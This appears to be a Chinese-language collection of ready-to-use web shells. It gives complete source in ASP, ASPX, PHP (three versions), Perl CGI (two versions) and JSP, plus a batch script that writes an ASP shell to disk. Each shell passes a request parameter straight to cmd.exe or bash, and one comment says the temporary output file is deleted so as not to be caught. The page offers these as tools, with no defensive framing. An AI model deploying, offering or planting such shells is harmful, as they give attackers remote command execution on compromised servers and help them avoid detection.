Cmd Shell ASP/ASPX/JSP/PHP/CGI【收藏】
Cmd Shell ASP/ASPX/JSP/PHP/CGICmd Shell ASP版本执行命令:<br>
<%
Dim oScript
Dim oScriptnet
Dim oFileSys, oFile
Dim szCMD,szTempFile
szCMD=request.form(".cmd")
'从输入框得到cmd
On Error Resume Next
'如果出现错误,直接跳过,防止弹出错误窗口
set oScript=server.createobject("WSCRIPT.SHELL")
'建立shell(wshshell)对象
set oFileSys=server.createobject("scripting.filesystemobject")
szTempFile="C:\"& oFileSys.GetTempName()
'GetTempName()是fso建立临时文件的一种方法
Call oScript.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
'调用wshshell函数的run来执行命令,并把它重定向到临时文件夹中
set oFile=oFileSys.OpenTextFile(szTempFile,1,False,0)
'以读的方式打开临时文件
%>
<HTML>
<body bgcolor="#C0C0C0" text="#000000">
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="好了" class=input>
</FORM>
<PRE>
<%
On Error Resume Next
response.write server.HTMLEncode(oFile.ReadAll)
'输出编码后的文件内容
oFile.close
'关闭文件
call oFileSys.DeleteFile(szTempFile,True)
'防止被抓住所以删除文件
%>
</body>
</html>
Cmd Shell PHP版本1
cmd.php
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['cmd']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
用法:http://127.0.0.1/cmd.php?cmd=ver
Cmd Shell PHP版本2
<html>
<head>
<title>CMD命令行PHP版</title>
<body bgcolor="c0c0c6" text="ffffff">
<center><font size=3 face="黑体" color=red>CMD命令行PHP版</font><br><font size=2 color="000000">by heiyeluren</font><br><br>
<FORM METHOD=POST ACTION="<? echo $PHP_SELF ?>">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" value="执行"> <INPUT TYPE="reset" value="重写">
</FORM>
</center>
<hr>
<font size=2 color="000000">
<?php
if(empty($cmd)) { //判断有没有输入命令
echo "没有输入任何命令!";
} elseif(!is_string($cmd)) { //判断变量是不是字符
echo "你输入的不是命令,请重新输入!";
} else {
echo `$cmd`; //执行获得的变量(命令)
}
?>
</font>
</body>
</html>
Cmd Shell PHP版本3
<FORM ACTION="sys.php" METHOD=POST>
Command: <INPUT TYPE=TEXT NAME=cmd>
<INPUT TYPE=SUBMIT VALUE="Run">
<FORM>
<PRE>
<?php
if(isset($cmd)) {
system($cmd);
}
?>
<PRE>
Cmd Shell CGI版本1
use CGI qw(:standard);
print header(-charset=>gb2312);
$cmd=param("cmd");
$out=`$cmd 2>&1`;
print start_form,textfield("cmd",$cmd,60);
print end_form;
print pre($out);
Cmd Shell CGI版本2
#!/usr/bin/perl
require "cgi-lib.pl";
print &PrintHeader;
print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n";
print "<INPUT NAME=cmd TYPE=TEXT>\n";
print "<INPUT TYPE=SUBMIT VALUE=Run>\n";
print "</FORM>\n";
&ReadParse(*in);
if($in{'cmd'} ne "") {
print "<PRE>\n$in{'cmd'}\n\n";
print `/bin/bash -c "$in{'cmd'}"`;
print "</PRE>\n";
}
Cmd Shell ASPX版本
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="执行" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">输入命令:</asp:Label>
</form>
</body>
</HTML>
Cmd Shell JSP版本
<FORM METHOD=GET ACTION='cmdexec.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
Cmd Shell Bat版本
echo ^<^% > cmdasp.asp
echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Set oScript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp
echo Set oScriptNet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp
echo Set oFileSys = Server.CreateObject(^"Scripting.FileSystemObject^")
>> cmdasp.asp
echo szCMD = Request.Form(^".CMD^") >> cmdasp.asp
echo If (szCMD ^<^> ^"^") Then >> cmdasp.asp
echo szTempFile = ^"C:\^" & oFileSys.GetTempName() >> cmdasp.asp
echo Call oScript.Run(^"cmd.exe /c ^" ^& szCMD ^& ^" ^> ^" ^& szTempFile,0,True)
>> cmdasp.asp
echo Set oFle = oFileSys.OpenTextFile(szTempFile,1,False,0) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"POST^"^>
>> cmdasp.asp
echo ^<input type=text name=^".CMD^" size=70 value=^"^<^%= szCMD ^%^>^"^> >> cmdasp.asp
echo ^<input type=submit value=^"Run^"^> >> cmdasp.asp
echo ^</FORM^> >> cmdasp.asp
echo ^<PRE^> >> cmdasp.asp
echo ^<^% >> cmdasp.asp
echo If (IsObject(oFile)) Then >> cmdasp.asp
echo On Error Resume Next >> cmdasp.asp
echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp
echo oFile.Close >> cmdasp.asp
echo Call oFileSys.DeleteFile(szTempFile, True) >> cmdasp.asp
echo End If >> cmdasp.asp
echo ^%^> >> cmdasp.asp
echo ^<^/PRE^> >> cmdasp.asp